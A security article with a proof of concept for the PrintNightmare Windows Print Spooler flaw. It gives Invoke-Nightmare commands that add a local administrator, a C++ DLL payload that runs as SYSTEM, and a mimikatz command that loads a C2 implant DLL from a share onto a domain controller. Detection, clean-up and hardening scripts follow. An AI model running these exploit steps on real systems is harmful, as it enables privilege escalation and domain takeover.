Exploitation of The Print Nightmare Vulnerability

18/07/2021
Eyad Almuqhim & Osama Alghamdi


Introduction
This article will summarize what the Print Nightmare vulnerability is and what it can lead to if exploited by adversaries. It will provide a Proof of Concept of exploiting the vulnerability in a Windows environment to showcase its impact and how to protect against it.

The Print Spooler Service
The Print Spooler (spoolsv.exe) is a Windows service that handles print jobs. The service's own description reads: "This service spools print jobs and handles interaction with the printer. If you turn off this service, you won't be able to print or see your printers."
The service runs by default on both Windows servers and clients.
The Print Nightmare Vulnerability
The name refers to two related vulnerabilities (CVE-2021-1675 and CVE-2021-34527) in the Windows Print Spooler service. They allow Local Privilege Escalation (LPE) from a normal user account to NT AUTHORITY\SYSTEM. The vulnerability can also be exploited remotely (Remote Code Execution, RCE) to obtain NT AUTHORITY\SYSTEM on a remote system using only a normal domain user account. In practice, this means a normal domain user can remotely exploit a vulnerable Print Spooler service on a domain controller and compromise the entire domain.

What is the SYSTEM account?
NT AUTHORITY\SYSTEM is also known as the computer account: it is the account the operating system itself runs under. It has the highest privileges on a Windows endpoint and is more powerful than the local Administrator account. For example, SYSTEM can read the SAM hive in the Registry, which contains the local users' password hashes, while the local Administrator cannot read it directly (although an Administrator has ways to elevate to SYSTEM).

When communicating with other endpoints as the SYSTEM account, you communicate as the computer itself. If the computer object has been granted permissions on other objects in the environment, a process running as SYSTEM can use those permissions, which is a potential avenue for lateral movement. Other endpoints see the host name followed by a dollar sign (COMPUTER$) when you connect to them as the computer account, i.e. as SYSTEM.
Exploitation
We will demonstrate exploiting the vulnerability for both Local Privilege Escalation (LPE) as well as exploiting a remote system (RCE).

Local Privilege Escalation (LPE)
One of the available exploits for Local Privilege Escalation (LPE) is written in PowerShell. It can be used in two ways. The first is to provide a username and a password: the exploit then generates a DLL that creates a local user with those credentials and adds it to the local Administrators group.

Note: the username "adm1n" and password "P@ssw0rd" are used if none are provided, which should be avoided.
To add a new local Administrator user, you can use the following command:

Import-Module .\CVE-2021-1675.ps1

Invoke-Nightmare -NewUser <username> -NewPassword <password>

The second option is to supply your own DLL as the exploit's payload instead of creating a local Administrator user. In our PoC we made a simple DLL that writes the output of the whoami command to a file in the Public user folder:

#include "pch.h"      // Visual Studio precompiled header for the DLL project
#include <windows.h>  // BOOL, APIENTRY, DLL_* reason codes
#include <cstdlib>    // system()

// Writes the identity of the process that loaded this DLL to a world-readable file.
int RunCMD()
{
    system("whoami > C:\\Users\\Public\\whoami.txt");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Runs as soon as the spooler loads the DLL, i.e. in the SYSTEM context.
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Running the exploit again, this time providing our DLL instead of creating a local Administrator (the full path of the DLL must be given, not a relative path):
Once executed, we see the confirmation that we are SYSTEM:
Remote Code Execution (RCE)
The RCE exploit is available in mimikatz. In this scenario, we have three machines involved:

WIN10: Source of exploitation, the machine that will run mimikatz to exploit the target. It is also the same machine hosting the DLL payload in an SMB share. The DLL is a C2 implant.

DC: The target whose Print Spooler service we will exploit. The DC will pull the DLL hosted on the WIN10 share.

C2 Server: A server that will receive the call back from the Spooler Service on the DC.

The exploitation requires a domain user. We will be using a normal domain user "vagrant":
We generated a DLL that establishes a connection to our C2 server and put it in a share that is accessible by the target:
We use mimikatz on the WIN10 machine with the domain controller (DC) as the target:

misc::printnightmare /server:dc.windomain.local /authdomain:windomain /authuser:vagrant /authpassword:vagrant /library:\\win10\share\c2.dll
After execution, we receive a call back on the C2 server from the DC with SYSTEM privileges:
And we are running under the Print Spooler service (spoolsv.exe):
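Both the LPE and RCE paths above end with spoolsv.exe installing a driver DLL it was handed by an unprivileged user, and that leaves traces in the spooler's own event logs. The following is an added example, not code from the original article; it assumes it is run elevated, that the Microsoft-Windows-PrintService/Operational log has been enabled (it is off by default), and that event IDs 316 (driver added or updated, with a "Files:-" list) and 808 (plug-in failed to load) keep Microsoft's documented format.

```powershell
# Added example (not part of the original article). Assumptions: run elevated; the
# PrintService/Operational log is enabled; event IDs 316/808 and the "Files:-"
# message format are Microsoft's, taken from public logging documentation.
function Get-PrintDriverEvents([int]$Hours = 24) {
    $since   = (Get-Date).AddHours(-$Hours)
    $filters = @(
        @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316; StartTime = $since },
        @{ LogName = 'Microsoft-Windows-PrintService/Admin';       Id = 808; StartTime = $since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue | ForEach-Object {
            $ev    = $_
            $files = @()
            # 316 messages end with "Files:- a.dll, b.dll, ...": extract that list when present.
            if ($ev.Message -match 'Files:-\s*(.+?)\.?\s*(No user action|$)') {
                $files = $Matches[1] -split ',\s*'
            }
            # Driver files referenced by UNC path (like \\win10\share\c2.dll above) or from
            # outside the spooler's driver store deserve analyst attention.
            $odd = @($files | Where-Object {
                $_ -match '^\\\\' -or ($_ -match '\\' -and $_ -notmatch 'spool\\drivers')
            })
            if ($ev.Id -eq 808) {
                $verdict = 'Spooler failed to load a plug-in: review the module named in the event'
            } elseif ($odd.Count -gt 0) {
                $verdict = 'Driver files from an unusual location: ' + ($odd -join ', ')
            } else {
                $verdict = 'Driver added or updated: confirm it was an administrator action'
            }
            [pscustomobject]@{
                Time    = $ev.TimeCreated
                Id      = $ev.Id
                Log     = $ev.LogName
                Verdict = $verdict
                Files   = ($files -join ', ')
            }
        }
    }
}

# Constructed usage: review the last three days on this host.
Get-PrintDriverEvents -Hours 72 | Sort-Object Time | Format-List
```

Run it on the target (the DC in the scenario above) rather than on the attacking machine, since the events are written by the spooler that loaded the DLL.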
Clean Up
It's important to remove any residuals of exploitation, especially if you create a local Administrator account.

If your payload was creating a local Administrator user, you can delete the user from an elevated command prompt:

net user <user_created> /delete
Also remove the DLLs created by the exploit on the target system. They are located under the following path:

C:\Windows\System32\spool\drivers\x64\3
Mitigation
The definitive fix for the Print Nightmare vulnerability is to disable the Print Spooler service wherever it is not required. With the service disabled, the vulnerable code is no longer reachable.

Stopping the service and setting its startup type to Disabled (so it does not start again on reboot):

Stop-Service Spooler -Verbose

Set-Service Spooler -StartupType Disabled -Verbose

If the service is needed and cannot be disabled, install the latest Windows patches and follow Microsoft's workarounds:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
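A read-only audit that ties the Clean Up and Mitigation steps together, as an added example that is not from the original article: it reports the spooler's state (flagging a running spooler on a domain controller, the target in the RCE scenario above), checks the Point and Print policy values, and lists DLLs in the driver store that are unsigned or recently written. It assumes PowerShell 5.1 or later run as Administrator, and that the PointAndPrint registry values are those named in Microsoft's workaround guidance for CVE-2021-34527 (verify against the MSRC link above).

```powershell
# Added example (not the article's code). Assumptions: run as Administrator on
# PowerShell 5.1+; PointAndPrint value names follow Microsoft's CVE-2021-34527 guidance.
$DriverDir = Join-Path $env:SystemRoot 'System32\spool\drivers\x64\3'
$PnPKey    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Test-SpoolerState {
    # DomainRole 4 or 5 means this host is a domain controller, where the spooler should not run.
    $svc  = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $isDC = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole -ge 4
    if (-not $svc) { $finding = 'Spooler service not present' }
    elseif ($svc.Status -eq 'Running' -and $isDC) { $finding = 'Spooler running on a domain controller: disable it' }
    elseif ($svc.StartType -ne 'Disabled') { $finding = 'Spooler enabled: disable it if printing is not required' }
    else { $finding = 'OK' }
    [pscustomobject]@{ Status = $svc.Status; StartType = $svc.StartType; IsDC = $isDC; Finding = $finding }
}

function Test-PointAndPrintHardening {
    # Hardened state: prompts not suppressed (0 or absent) and driver installs restricted to admins (1).
    $p = Get-ItemProperty -Path $PnPKey -ErrorAction SilentlyContinue
    if ($p.NoWarningNoElevationOnInstall -eq 1 -or $p.UpdatePromptSettings -eq 1) {
        $finding = 'Point and Print prompts suppressed: set both values to 0'
    } elseif ($p.RestrictDriverInstallationToAdministrators -ne 1) {
        $finding = 'RestrictDriverInstallationToAdministrators is not set to 1'
    } else { $finding = 'OK' }
    [pscustomobject]@{
        NoWarningNoElevationOnInstall              = $p.NoWarningNoElevationOnInstall
        UpdatePromptSettings                       = $p.UpdatePromptSettings
        RestrictDriverInstallationToAdministrators = $p.RestrictDriverInstallationToAdministrators
        Finding                                    = $finding
    }
}

function Get-SuspiciousSpoolerDlls([int]$Days = 7) {
    # Payload DLLs dropped by the exploit land in the driver store named under Clean Up;
    # flag DLLs there that are unsigned or were written recently so they can be reviewed.
    Get-ChildItem -Path $DriverDir -Filter '*.dll' -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{ Path = $_.FullName; LastWrite = $_.LastWriteTime
                               Signature = $sig.Status; Signer = $sig.SignerCertificate.Subject }
        } |
        Where-Object { $_.Signature -ne 'Valid' -or $_.LastWrite -gt (Get-Date).AddDays(-$Days) }
}

Test-SpoolerState
Test-PointAndPrintHardening
Get-SuspiciousSpoolerDlls | Format-Table -AutoSize
```

Legitimate vendor driver DLLs in the store are normally signed, so anything reported as NotSigned deserves a closer look before it is deleted.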
Conclusion
This article covered the Print Nightmare vulnerability and its exploitability as of the date of writing. It is important to keep up with Microsoft's security update guide for any developments around this vulnerability or related issues.
